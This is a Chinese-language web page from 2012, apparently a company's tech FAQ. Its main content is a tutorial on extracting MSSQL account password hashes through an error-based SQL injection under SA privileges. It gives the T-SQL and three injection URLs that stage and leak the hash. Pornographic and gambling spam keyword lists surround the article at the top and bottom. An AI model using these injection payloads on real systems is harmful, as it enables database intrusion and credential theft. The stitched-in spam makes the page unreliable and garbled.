男人吃奶摸下挵进去好爽,日日躁夜夜躁狠狠躁,freesexvide0s性欧美高清,高清freexxxx性国产,无码人妻一区二区三区一,乱人伦中文字幕成人网站在线,亚洲欧美综合一区二区三区 ,神马影院在线视频观看
知識學堂
  • ·聯系電話:+86.023-75585550
  • ·聯系傳真:+86.023-75585550
  • ·24小時手機:13896886023
  • ·QQ 咨 詢:361652718 513960520
當前位置 > 首頁 > 知識學堂 > 常見技術問題
SA注入點通過報錯提取SQL賬戶HASH
更新時間:2012-04-11 | 發布人:本站 | 點擊率:454

sysxlogins表中的password字段是varbinary,是沒有辦法通過報錯獲得的。最近偶爾看到一個叫xp_varbintohexstr的擴展儲存,便有了思路:

核心演示代碼(查詢分析器)

declare @p varbinary(64),@u varchar(16),@s varchar(128);
select top 1 @u = name,@p = password from (select top 1 * from sysxlogins where password is NOT NULL order by name ASC)T order by name DESC;
exec xp_varbintohexstr @p,@s OUT;
select 'User:' + @u + '/Hash:' + @s;


理論的推導往往是可憎的,一下為本機asp+SA顯錯的測試結果:

Step.1

http://localhost/inject.asp?id=1;create+table+SQLhash(hash+varchar(2000))--

Step.2

http://localhost/inject.asp?id=1;declare+@p+varbinary(64),@u+varchar(16),@s+varchar(128);select+top+1+@u+=+name,@p+=+password+from+(select+top+1+*+from+master.dbo.sysxlogins+where+password+is+NOT+NULL+order+by+name+ASC)T+order+by+name+DESC;exec+master..xp_varbintohexstr+@p,@s+OUT;set+@s+=+'User:'+%2b+@u+%2b+'/Hash:'+%2b+@s;insert+into+SQLhash(hash)+values(@s)--

Step.3

http://localhost/inject.asp?id=1+and+(select+top+1+hash+from+SQLhash)=0--



 

分享到: QQ空間 新浪微博 開心網 人人網
主站蜘蛛池模板: 亚洲国产v高清在线观看| 久久久久亚洲av成人网人人网站 | 最近免费中文字幕mv视频7| 丰满大爆乳波霸奶| gogogo高清免费看韩国| xxx性欧美69| 久久午夜夜伦鲁鲁片免费无码| 姐姐6电视剧在线观看| 人人妻人人澡人人爽欧美一区双| 久久久综合香蕉尹人综合网| 婷婷涩涩五月天综合蜜桃| 爱如潮水在线观看视频| 青青草国产成人99久久| 国产欧美精品另类又又久久| 玩弄丰满少妇人妻视频| 欧美精品videofree| 中文天堂资源| 无码精品视频一区二区三区| 97人人模人人爽人人少妇| 日韩精品真人荷官无码| 少妇人妻偷人精品视频| 夫前人妻被灌醉侵犯在线| 中国免费毛片网络| 色偷偷av一区二区三区| 电影在线观看+伦理片| 熟女人妻视频| 国产在线精品国自产拍影院同性| 国产亚洲精品久久久久妲己| 亚洲av成人午夜福利| 国产成人亚洲精品乱码| 精品国产乱码久久久久久1区2区| 公的浮之手中字1| 公的浮之手中字1| 777国产偷窥盗摄精品品在线| 浪漫樱花免费播放高清版在线观看 | av天堂午夜精品一区| 免费120秒体验试看5次| 野花高清在线观看免费全集7| 亚洲男人的天堂在线播放| 国产精品国产三级国产专区50| 狠狠躁日日躁夜夜躁2022麻豆|